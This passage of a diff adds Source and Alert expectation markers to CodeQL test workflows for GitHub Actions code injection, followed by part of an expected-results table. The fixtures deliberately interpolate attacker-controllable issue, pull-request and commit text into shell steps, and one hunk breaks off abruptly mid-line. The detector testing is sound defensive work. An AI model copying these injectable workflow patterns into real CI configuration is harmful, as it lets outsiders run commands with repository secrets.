$ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] issues2: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq 
".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: body run: | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.body.outputs.body}}" + echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.comments.outputs.comments}}" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] pulls3: runs-on: ubuntu-latest steps: 
@@ -113,20 +113,20 @@ jobs: run: | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $DETAILS | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title1.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title1.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: title2 run: | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title2.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title2.outputs.title}}" # $ Alert[actions/code-injection/critical] - id: title3 run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author) TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" - - run: echo "${{ steps.title3.outputs.title}}" + echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] + - run: echo "${{ steps.title3.outputs.title}}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml index 03ee63fe9cf4..5bca1705b9db 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -22,9 +22,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 1 + - name: Changed files 1 # $ Source[actions/code-injection/critical] run: | - echo changed: ${{ steps.changed.outputs.locale_files }} + echo changed: ${{ steps.changed.outputs.locale_files }} # $ Alert[actions/code-injection/critical] echo changed: ${{ steps.changed.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 
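Review bot: In the `Changed files 1` step of test2.yml only the `locale_files` line is marked; the `echo changed: ${{ steps.changed.outputs.changes }}` line directly below is left bare, which under inline expectations asserts that no alert is raised there. That is probably deliberate: if `steps.changed` is the `dorny/paths-filter` step, its `changes` output lists the names of the matching filters rather than file paths. The fixture does not say so, however. A trailing `# no alert: filter names only` on that line, and on its twin in the `Changed files 2` hunk, would record the negative case explicitly.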
@@ -34,9 +34,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 2 + - name: Changed files 2 # $ Source[actions/code-injection/critical] run: | - echo changed:${{ steps.changed2.outputs.locale_files }} + echo changed:${{ steps.changed2.outputs.locale_files }} # $ Alert[actions/code-injection/critical] echo changed: ${{ steps.changed2.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml index 27d8a666fc9e..9f906d507cfe 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -12,7 +12,7 @@ jobs: echo " " echo "github.ref = ${{ github.ref }}" echo "github.sha = ${{ github.sha }}" - echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" # $ Alert[actions/code-injection/medium] echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml index 03ecc20de86a..292891b8ccb4 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml 
@@ -19,6 +19,6 @@ jobs: id: extract_info shell: bash run: | - echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT - echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT - echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml index c1846b8f51ec..3661cd885a44 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -14,6 +14,6 @@ jobs: label_marker_start: '>>' label_marker_end: '<<' - - name: Show parsed data JSON + - name: Show parsed data JSON # $ Source[actions/code-injection/critical] run: | - echo ${{ steps.parse.outputs.payload }} + echo ${{ steps.parse.outputs.payload }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml index 0bd666dc9485..5cf1093c8bbc 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml @@ -9,5 +9,5 @@ jobs: - name: Issue Forms Body Parser id: parse uses: zentered/issue-forms-body-parser@v2.0.0 - - run: echo ${{ steps.parse.outputs.data }} - - run: echo ${{ toJSON(steps.parse.outputs.data) }} + - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] + - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml index 8648d86983ee..532ce731d104 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml @@ -17,7 +17,7 @@ jobs: - name: Fetch the issue id: read_issue_body run: - echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] - name: Issue Forms Body Parser id: parse @@ -25,5 +25,5 @@ jobs: with: body: ${{ steps.read_issue_body.outputs.body }} - - run: echo ${{ steps.parse.outputs.data }} - - run: echo ${{ toJSON(steps.parse.outputs.data) }} + - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml index e9ba77c0f939..86e76277f6e9 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml 
@@ -38,7 +38,7 @@ jobs: persist-credentials: false ref: ${{ steps.get-sha.outputs.sha }} fetch-depth: 0 - - name: Get version + - name: Get version # $ Source[actions/code-injection/critical] id: get-version run: | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
